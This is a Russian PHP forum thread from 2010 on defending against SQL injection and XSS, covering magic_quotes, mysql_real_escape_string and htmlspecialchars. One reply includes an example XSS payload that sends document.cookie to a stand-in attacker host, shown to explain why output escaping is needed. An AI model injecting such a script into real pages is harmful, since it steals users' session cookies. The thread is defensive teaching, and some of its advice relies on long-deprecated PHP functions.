Защита от инъекций

@Runa · Регистрация: 28.08.2009

Студворк — интернет-сервис помощи студентам

Подскажите какие символы остаются не экранированными и угрожают безопасности, если включена директива magic_quotes?

Добавлено через 10 часов 44 минуты
Неужели ничего не пропускает? Или Все равно требуется проверка?

Vovan-VE · 24.05.2010, 19:30

magic_quotes - устаревшая и изначально идиотская фича. Вместо помощь только дополнительный геморрой добавляет.
Когда она включена, то (ИМХО) из $_POST, $_GET и $_COOKIE лучше убрать лишнее экранирование stripslashes() и работать с адекватными данными.

Humanoid · 24.05.2010, 19:54

Документация говорит, что

When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash) and NUL's are escaped with a backslash automatically.

Т.е. экранируется одинарная кавычка, двойная кавычка, слеш и нулевой символ.

Vovan-VE · 24.05.2010, 19:58

Разные СУБД требуют экранировать еще другие символы (\r, \n, \f, \x1A). При включенном magic_quotes есть вероятность либо заэкранировать что-то лишний раз, либо что-то недоэкранировать.

Humanoid · 24.05.2010, 21:31

Vovan-VE, согласен. Хотя, для MySQL в кодировке windows-1251 magic_quotes вполне достаточно. Это точно тоже, если выполнить функцию addslashes(). Но по умолчанию magic_quotes_gpc выключен... поэтому, если его включить на своём сервере и составлять скрипты с учётом этой опции, то при закачивании скрипта на хостинг могут быть очень неприятные моменты, когда выяснится, что на хостинге эта опция выключена... тогда сайт окажется дырявым. Как сказал Vovan-VE, для некоторых СУБД этих символов может быть недостаточно. Кроме того, если используются некоторые юникодовские кодировки (не помню, распространяется ли уязвимость на utf16... кажется, да), то для них обязательно нужно использовать mysql_real_escape_string, которая учитывает кодировку БД и экранирует символы, которые перечислил Vovan-VE. Но для этой функции нужно что бы было установлено соединение с БД.

@Runa · 25.05.2010, 06:07 **[ТС]**

Огромное спасибо за подробно и доступно изложенную информацию.
Если я правильно поняла, нужно:
1) убрать экранирование на случай, если оно включено с помощью stripslashes()
2) заново экранировать через mysql_real_escape_string

а на случай Code и XSS инъекций какие меры защиты следует предпринять?

Humanoid · 25.05.2010, 08:46

Сообщение от Maruna

Если я правильно поняла, нужно:
1) убрать экранирование на случай, если оно включено с помощью stripslashes()
2) заново экранировать через mysql_real_escape_string

Желательно... этот способ более универсальный и подойдёт к любым кодировкам и любому значению magic_quotes_gpc

Сообщение от Maruna

а на случай Code и XSS инъекций какие меры защиты следует предпринять?

Из всех выводимых на экран переменных нужно убирать теги с помощью htmlspecialchars()
Например

PHP
1
2
if (isset($_POST['txt'])) $txt=$_POST['txt']; else $txt='';
echo htmlspecialchars($txt,ENT_QUOTES,'cp1251');

Ведь передать через POST злоумышленник может какой-нибудь JavaScript... что бы этот скрипт не выполнялся в браузере, ему нужно обрезать теги. htmlspecialchars сделает из

HTML5
1
2
3
<script type="text/javascript">
location.href="www.сайт_хакера.ru/a.php?c="+document.cookie;
</script>

HTML5
1
2
3
&lt;script type=&quot;text/javascript&quot;&gt;
location.href=&quot;www.сайт_хакера.ru/a.php?c=&quot;+document.cookie;
&lt;/script&gt;

В результате это уже будет не JavaScript, а просто безобидный текст.

@Runa · 25.05.2010, 09:05 **[ТС]**

Спасибо за помощь!

Новые блоги и статьи Все статьи Все блоги /
Советы по крайней бережливости. Внимание, это ОЧЕНЬ длинный пост. Programma_Boinc 28.12.2025 Советы по крайней бережливости. Внимание, это ОЧЕНЬ длинный пост. Налог на собак: https:/ / ********/ gallery/ V06K53e Финансовый отчет в Excel: https:/ / ********/ gallery/ bKBkQFf Пост отсюда. . .	Кто-нибудь знает, где можно бесплатно получить настольный компьютер или ноутбук? США. Programma_Boinc 26.12.2025 Нашел на реддите интересную статью под названием Anyone know where to get a free Desktop or Laptop? Ниже её машинный перевод. После долгих разбирательств я наконец-то вернула себе. . .	Thinkpad X220 Tablet — это лучший бюджетный ноутбук для учёбы, точка. Programma_Boinc 23.12.2025 Рецензия / Мнение/ Перевод Нашел на реддите интересную статью под названием The Thinkpad X220 Tablet is the best budget school laptop period . Ниже её машинный перевод. Thinkpad X220 Tablet —. . .	PhpStorm 2025.3: WSL Terminal всегда стартует в ~ and_y87 14.12.2025 PhpStorm 2025. 3: WSL Terminal всегда стартует в ~ (home), игнорируя директорию проекта Симптом: После обновления до PhpStorm 2025. 3 встроенный терминал WSL открывается в домашней директории. . .	Как объединить две одинаковые БД Access с разными данными VikBal 11.12.2025 Помогите пожалуйста !! Как объединить 2 одинаковые БД Access с разными данными.
Новый ноутбук volvo 07.12.2025 Всем привет. По скидке в "черную пятницу" взял себе новый ноутбук Lenovo ThinkBook 16 G7 на Амазоне: Ryzen 5 7533HS 64 Gb DDR5 1Tb NVMe 16" Full HD Display Win11 Pro	Музыка, написанная Искусственным Интеллектом volvo 04.12.2025 Всем привет. Некоторое время назад меня заинтересовало, что уже умеет ИИ в плане написания музыки для песен, и, собственно, исполнения этих самых песен. Стихов у нас много, уже вышли 4 книги, еще 3. . .	От async/await к виртуальным потокам в Python IndentationError 23.11.2025 Армин Ронахер поставил под сомнение async/ await. Создатель Flask заявляет: цветные функции - провал, виртуальные потоки - решение. Не threading-динозавры, а новое поколение лёгких потоков. Откат?. . .	Поиск "дружественных имён" СОМ портов Argus19 22.11.2025 Поиск "дружественных имён" СОМ портов На странице: https:/ / norseev. ru/ 2018/ 01/ 04/ comportlist_windows/ нашёл схожую тему. Там приведён код на С++, который показывает только имена СОМ портов, типа,. . .	Сколько Государство потратило денег на меня, обеспечивая инсулином. Programma_Boinc 20.11.2025 Сколько Государство потратило денег на меня, обеспечивая инсулином. Вот решила сделать интересный приблизительный подсчет, сколько государство потратило на меня денег на покупку инсулинов. . . .

@Runa 134 / 87 / 22 Регистрация: 28.08.2009 Сообщений: 363

	Защита от инъекций 24.05.2010, 15:35. Показов 2925. Ответов 7 Метки нет (Все метки) Подскажите какие символы остаются не экранированными и угрожают безопасности, если включена директива magic_quotes? Добавлено через 10 часов 44 минуты Неужели ничего не пропускает? Или Все равно требуется проверка? 0

Vovan-VE 13210 / 6599 / 1041 Регистрация: 10.01.2008 Сообщений: 15,069
	24.05.2010, 19:30
	magic_quotes - устаревшая и изначально идиотская фича. Вместо помощь только дополнительный геморрой добавляет. Когда она включена, то (ИМХО) из $_POST, $_GET и $_COOKIE лучше убрать лишнее экранирование stripslashes() и работать с адекватными данными. 0

Vovan-VE 13210 / 6599 / 1041 Регистрация: 10.01.2008 Сообщений: 15,069
	24.05.2010, 19:58
	Разные СУБД требуют экранировать еще другие символы (\r, \n, \f, \x1A). При включенном magic_quotes есть вероятность либо заэкранировать что-то лишний раз, либо что-то недоэкранировать. 1

Humanoid Почетный модератор 11553 / 4348 / 452 Регистрация: 12.06.2008 Сообщений: 12,453
	24.05.2010, 21:31
	Vovan-VE, согласен. Хотя, для MySQL в кодировке windows-1251 magic_quotes вполне достаточно. Это точно тоже, если выполнить функцию addslashes(). Но по умолчанию magic_quotes_gpc выключен... поэтому, если его включить на своём сервере и составлять скрипты с учётом этой опции, то при закачивании скрипта на хостинг могут быть очень неприятные моменты, когда выяснится, что на хостинге эта опция выключена... тогда сайт окажется дырявым. Как сказал Vovan-VE, для некоторых СУБД этих символов может быть недостаточно. Кроме того, если используются некоторые юникодовские кодировки (не помню, распространяется ли уязвимость на utf16... кажется, да), то для них обязательно нужно использовать mysql_real_escape_string, которая учитывает кодировку БД и экранирует символы, которые перечислил Vovan-VE. Но для этой функции нужно что бы было установлено соединение с БД. 1

@Runa 134 / 87 / 22 Регистрация: 28.08.2009 Сообщений: 363
	25.05.2010, 06:07 [ТС]
	Огромное спасибо за подробно и доступно изложенную информацию. Если я правильно поняла, нужно: 1) убрать экранирование на случай, если оно включено с помощью stripslashes() 2) заново экранировать через mysql_real_escape_string а на случай Code и XSS инъекций какие меры защиты следует предпринять? 0

@Runa 134 / 87 / 22 Регистрация: 28.08.2009 Сообщений: 363
	25.05.2010, 09:05 [ТС]
	Спасибо за помощь! 0